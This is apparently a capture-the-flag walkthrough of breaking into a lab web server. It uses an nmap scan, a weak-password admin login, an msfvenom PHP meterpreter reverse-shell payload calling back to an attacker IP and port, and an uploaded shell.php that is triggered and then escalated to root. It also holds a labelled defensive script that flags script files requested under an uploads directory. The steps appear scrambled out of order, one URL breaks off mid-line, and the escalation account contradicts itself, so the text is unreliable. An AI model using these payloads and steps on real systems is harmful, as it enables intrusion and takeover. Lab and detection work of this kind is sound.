http://10.10.10.15

The webpage appears to be a simple website with a "Contact Us" form. However, upon inspecting the page source, we notice a peculiar comment:
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f raw > shell.php

Uploading the shell to the server via the "Upload File" feature, we can then trigger the execution of the shell by accessing the uploaded file:
After exploring the file system, we discover that the sudo command has been configured to allow the fish user to run any command without a password:
With administrative access, we can now explore the application's functionality. Upon reviewing the dashboard, we notice an "Upload File" feature. This feature can potentially be used to execute arbitrary code on the server.
Next, we visit the HTTP service running on port 80: http://10
nmap -sV -p- 10.10.10.15

The scan reveals that ports 22 (SSH), 80 (HTTP), and 8080 (HTTP) are open. We can now focus on exploring these services further.
<!-- TODO: move to prod env -->

This hint suggests that the website might be running in a non-production environment. We can try to access the /admin directory, which often contains administrative interfaces:
http://10.10.10.15/uploads/shell.php

A meterpreter shell opens, allowing us to navigate the file system and escalate privileges.
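As an added example (not part of the original write-up), the upload-and-trigger step above leaves a trace that can be detected in web server access logs: the sketch below flags requests for script-like files under the upload directory. The log lines, the /admin/upload path and the extension list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Uploads are served from /uploads/, as in the write-up.
UPLOAD_PREFIX = "/uploads/"
# Extensions commonly mapped to the PHP handler (assumption; match your server config).
# Also catches double extensions such as "a.php.jpg".
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)
# Common/combined log format: ip - user [time] "METHOD target PROTO" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')


def suspicious_upload_hits(lines):
    """Return (ip, time, path, status) for script-like files requested under /uploads/."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip malformed lines
        ip, when, _method, target, status = m.groups()
        # Drop the query string and decode percent-encoding before matching.
        path = unquote(urlsplit(target).path)
        if not path.lower().startswith(UPLOAD_PREFIX):
            continue
        name = path.rsplit("/", 1)[-1]
        if SCRIPT_EXT.search(name):
            hits.append((ip, when, path, int(status)))
    return hits


# Constructed sample log lines (documentation IP ranges, hypothetical upload endpoint).
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2024:10:00:01 +0000] "POST /admin/upload HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2024:10:00:09 +0000] "GET /uploads/shell.php HTTP/1.1" 200 0',
    '192.0.2.7 - - [01/Jan/2024:10:01:00 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 20480',
    '192.0.2.9 - - [01/Jan/2024:10:02:00 +0000] "GET /uploads/a.%70hp.jpg?x=1 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in suspicious_upload_hits(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the server handed an uploaded file to the script handler; the durable fix is to store uploads outside the web root or disable script execution for that directory.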
http://10.10.10.15/admin

Indeed, we find a simple login form. After attempting some common credentials, we manage to log in using the username admin and password password123.
cat ~fish/config

The file contains a password for the root user. We can now switch to the root user and gain full access to the system:
su root